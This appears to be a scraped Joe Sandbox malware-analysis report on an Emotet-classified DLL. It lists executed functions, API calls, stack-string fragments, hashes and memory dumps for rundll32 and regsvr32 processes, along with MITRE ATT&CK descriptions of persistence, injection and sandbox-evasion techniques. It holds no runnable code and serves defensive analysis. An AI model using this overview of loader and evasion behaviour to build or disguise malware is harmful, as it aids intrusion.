Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 2256, Parent PID: 4360COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	2

Executed Functions

Function 000001F592EF0000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 000001F592EF0344
VirtualAlloc.KERNELBASE ref: 000001F592EF038A
VirtualProtect.KERNELBASE ref: 000001F592EF085C
RtlAddFunctionTable.KERNEL32 ref: 000001F592EF08E9

Strings

ct, xrefs: 000001F592EF00DD
rote, xrefs: 000001F592EF00D5
lloc, xrefs: 000001F592EF00BD
aryA, xrefs: 000001F592EF00A5
ualA, xrefs: 000001F592EF00B5
temI, xrefs: 000001F592EF011F
ualP, xrefs: 000001F592EF00CD
Virt, xrefs: 000001F592EF00AD
onTa, xrefs: 000001F592EF0148
hIns, xrefs: 000001F592EF00EB
eSys, xrefs: 000001F592EF0117
o, xrefs: 000001F592EF012E
tion, xrefs: 000001F592EF00F9
ddFu, xrefs: 000001F592EF013A
Slee, xrefs: 000001F592EF0084
RtlA, xrefs: 000001F592EF0133
nf, xrefs: 000001F592EF0127
Load, xrefs: 000001F592EF0095
Flus, xrefs: 000001F592EF00E4
Cach, xrefs: 000001F592EF0100
ativ, xrefs: 000001F592EF010F
GetN, xrefs: 000001F592EF0107
Virt, xrefs: 000001F592EF00C5
ncti, xrefs: 000001F592EF0141
Libr, xrefs: 000001F592EF009D
truc, xrefs: 000001F592EF00F2

Memory Dump Source

Source File: 00000005.00000002.313695180.000001F592EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F592EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1f592ef0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: a5e499711515b41ff4d8637ab07933d1e60326c663acc822741fc42b8b6f60c2
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 4062D130619A49CBD72DDF18C8857F9B3E2FB94304F10462DE98AC7295DB74E942CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000005.00000002.312512000.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 2992, Parent PID: 2256COMMON

Execution Graph

Execution Coverage:	18.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	51
Total number of Limit Nodes:	5

Executed Functions

Function 00D80000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 00D80344
VirtualAlloc.KERNELBASE ref: 00D8038A
VirtualProtect.KERNELBASE ref: 00D8085C
RtlAddFunctionTable.KERNEL32 ref: 00D808E9

Strings

Flus, xrefs: 00D800E4
ncti, xrefs: 00D80141
aryA, xrefs: 00D800A5
temI, xrefs: 00D8011F
Cach, xrefs: 00D80100
ualA, xrefs: 00D800B5
tion, xrefs: 00D800F9
truc, xrefs: 00D800F2
nf, xrefs: 00D80127
ualP, xrefs: 00D800CD
rote, xrefs: 00D800D5
ativ, xrefs: 00D8010F
Libr, xrefs: 00D8009D
eSys, xrefs: 00D80117
onTa, xrefs: 00D80148
o, xrefs: 00D8012E
Virt, xrefs: 00D800C5
ct, xrefs: 00D800DD
ddFu, xrefs: 00D8013A
Virt, xrefs: 00D800AD
Load, xrefs: 00D80095
lloc, xrefs: 00D800BD
RtlA, xrefs: 00D80133
hIns, xrefs: 00D800EB
Slee, xrefs: 00D80084
GetN, xrefs: 00D80107

Memory Dump Source

Source File: 00000006.00000002.697266233.0000000000D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d80000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 16f5b9200c826d87bcc5bc835942fdf750868d1bdfa5b19750943287426e2a45
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 17520530618B488BD759EF18D8857BABBF1FB54304F14462DE88BC7251DB34E58ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013CEC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 0000000180013EB4

Strings

n, xrefs: 0000000180013DC8
,, xrefs: 0000000180013DE9

Memory Dump Source

Source File: 00000006.00000002.700027974.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: Create
String ID: n$,
API String ID: 2289755597-3401186129
Opcode ID: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
Instruction ID: 2cb52e6b05ba7e48ba693a2826620437475c4cbbd9ed89f570f000b883edcea4
Opcode Fuzzy Hash: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
Instruction Fuzzy Hash: C251037051C7848FD7B8DF68D08579AFBE0FB88314F108A2EE88DD3250DB7498858B92

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001874 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 00000001800019FF

Memory Dump Source

Source File: 00000006.00000002.700027974.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
Instruction ID: 43b5742128dda7179e1ece1c22ac01b13fc8f1aebeeb4861cd8a3c6048fefe45
Opcode Fuzzy Hash: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
Instruction Fuzzy Hash: 9A412A7051C7858FE7B4DF28D485B9AB7E0FB88315F10896DE88CC7296DB748888CB46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 5768, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	41
Total number of Limit Nodes:	3

Executed Functions

Function 024B0000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 024B0344
VirtualAlloc.KERNELBASE ref: 024B038A
VirtualProtect.KERNELBASE ref: 024B085C
RtlAddFunctionTable.KERNEL32 ref: 024B08E9

Strings

nf, xrefs: 024B0127
tion, xrefs: 024B00F9
RtlA, xrefs: 024B0133
lloc, xrefs: 024B00BD
Load, xrefs: 024B0095
temI, xrefs: 024B011F
Virt, xrefs: 024B00C5
ddFu, xrefs: 024B013A
ncti, xrefs: 024B0141
ualP, xrefs: 024B00CD
truc, xrefs: 024B00F2
aryA, xrefs: 024B00A5
o, xrefs: 024B012E
ualA, xrefs: 024B00B5
Flus, xrefs: 024B00E4
Cach, xrefs: 024B0100
Libr, xrefs: 024B009D
ativ, xrefs: 024B010F
GetN, xrefs: 024B0107
Virt, xrefs: 024B00AD
hIns, xrefs: 024B00EB
Slee, xrefs: 024B0084
onTa, xrefs: 024B0148
rote, xrefs: 024B00D5
ct, xrefs: 024B00DD
eSys, xrefs: 024B0117

Memory Dump Source

Source File: 0000000C.00000002.461311169.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_24b0000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: ce6d3bfd21d442ae3d16ee0979d0cfc8eff92f1d19d9d0658c875c86585047fb
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 1152D130618B488BCB1ADF18D8857BBB7E1FF54305F14562EE88AC7251DB34E586CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 0000000C.00000002.461600527.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report En3ZIyuYdw.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
En3ZIyuYdw.dll

Function 00007FFA0AE73FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Function 0000020509D60000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Function 0000000180004DDC Relevance: 7.8, Strings: 6, Instructions: 338
COMMON

Function 0000000180028C94 Relevance: 6.5, Strings: 5, Instructions: 249
COMMON

Function 0000000180005DB4 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Function 00000001800248E0 Relevance: 5.9, Strings: 4, Instructions: 869
COMMON

Function 00000001800038A5 Relevance: 5.2, Strings: 4, Instructions: 197
COMMON

Function 00007FFA0AE64194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON